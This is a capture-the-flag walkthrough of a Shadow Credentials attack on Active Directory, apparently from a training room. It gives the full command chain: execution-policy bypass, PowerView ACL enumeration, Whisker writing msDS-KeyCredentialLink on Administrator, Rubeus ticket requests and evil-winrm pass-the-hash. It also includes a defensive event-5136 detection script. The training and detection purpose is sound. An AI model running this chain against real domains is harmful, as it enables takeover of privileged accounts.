Day 11

Active Directory Jingle Bells, Shadow Spells

Learning Objectives

  • Understanding Active Directory

  • Introduction to Windows Hello for Business

  • Prerequisites for exploiting GenericWrite privilege

  • How the Shadow Credentials attack works

  • How to exploit the vulnerability

Active Directory 101

Active Directory (AD) is a system mainly used by businesses in Windows environments. It's a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.

This room is straightforward, with all the commands and instructions given to us.

As instructed, we first execute the following commands in PowerShell as part of our enumeration.

cd C:\Users\hr\Desktop #moves to the folder containing all the exploitation tools.
powershell -ep bypass #will bypass the default policy for arbitrary PowerShell script execution.
. .\PowerView.ps1 #loads the PowerView script into the memory.

We then execute this command.

Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

Enumeration gives us the user ID.

We can now proceed with the exploit.

As instructed we use the tool Whisker.

Whisker is a C# utility created by Elad Shamir. Using Whisker is straightforward: once we have a vulnerable user, we can run the add command from Whisker to simulate the enrollment of a malicious device, updating the msDS-KeyCredentialLink attribute.

This task can be accomplished by running the following command:

.\Whisker.exe add /target:Administrator

In our case, we'll have to replace the /target parameter with the one from the enumeration step executed inside our VM.

The tool conveniently provides the certificate needed to authenticate as the vulnerable user, along with a ready-made command to launch with Rubeus.
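From the defender's side, the write to msDS-KeyCredentialLink described above is what a detection should key on. The following is an added example (not part of the room or of Whisker) that runs a simple rule over constructed Windows Security event 5136 records; it assumes directory-service change auditing and a SACL on the attribute are in place, and the field names and the resolved "Value Added"/"Value Deleted" strings are assumptions matching the 5136 event layout.

```python
# Added example: flag suspicious writes to msDS-KeyCredentialLink using
# Windows Security event 5136 ("A directory service object was modified").
# Records are constructed here; real events carry the same fields in XML.
from dataclasses import dataclass

@dataclass
class DsChangeEvent:
    event_id: int
    subject_user: str        # SubjectUserName: account that performed the write
    object_dn: str           # ObjectDN: the object that was modified
    attribute: str           # AttributeLDAPDisplayName
    operation: str           # OperationType, resolved here to "Value Added"/"Value Deleted"

def object_sam(object_dn: str) -> str:
    """Approximate sAMAccountName from the leading CN= of a user DN."""
    first_rdn = object_dn.split(",", 1)[0]
    return first_rdn.split("=", 1)[1].strip().lower()

def is_shadow_credential_write(ev: DsChangeEvent) -> bool:
    """True when a principal other than the target account adds a key
    credential to that account, which is how a Shadow Credentials attack
    (e.g. Whisker add) appears in the audit log."""
    if ev.event_id != 5136:
        return False
    if ev.attribute.lower() != "msds-keycredentiallink":
        return False
    if ev.operation != "Value Added":
        return False
    # Legitimate Windows Hello for Business enrolment writes the user's
    # own key; a write by a different principal is the suspicious case.
    return ev.subject_user.lower() != object_sam(ev.object_dn)

def find_suspicious(events):
    return [ev for ev in events if is_shadow_credential_write(ev)]

# Constructed sample events (placeholder domain, not room data).
SAMPLE_EVENTS = [
    DsChangeEvent(5136, "hr", "CN=Administrator,CN=Users,DC=lab,DC=local",
                  "msDS-KeyCredentialLink", "Value Added"),   # attack pattern
    DsChangeEvent(5136, "alice", "CN=alice,CN=Users,DC=lab,DC=local",
                  "msDS-KeyCredentialLink", "Value Added"),   # self-enrolment
    DsChangeEvent(5136, "hr", "CN=Administrator,CN=Users,DC=lab,DC=local",
                  "description", "Value Added"),              # other attribute
    DsChangeEvent(5136, "hr", "CN=Administrator,CN=Users,DC=lab,DC=local",
                  "msDS-KeyCredentialLink", "Value Deleted"), # removal, not flagged
]

if __name__ == "__main__":
    for ev in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT: {ev.subject_user} added a key credential to {ev.object_dn}")
```

A fuller rule would also alert on removals by a third party (cleanup after the attack) and correlate with a subsequent Kerberos TGT request (event 4768) using certificate authentication for the same account.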

Rubeus is a C# toolset designed for direct Kerberos interaction and exploitation, developed by SpecterOps. The hash it returns is what we use for a pass-the-hash attack!

The next command will be:

.\Rubeus.exe asktgt <#COPY THIS PORTION FROM THE OUTPUT OF WHISKER#>

This will give us an NTLM hash, which we can use with Evil-WinRM, a tool for remotely managing Windows systems that abuses the Windows Remote Management (WinRM) protocol.

evil-winrm -i 'IP_MACHINE' -u 'USERNAME' -H 'NTLM_HASH'

Remote access with Evil-WinRM

This gives us remote access, and we can proceed with answering the questions.

What is the hash of the vulnerable user?
[REDACTED]
This can be found in the output of Rubeus.

What is the content of flag.txt on the Administrator Desktop?
[REDACTED]
Flag found.
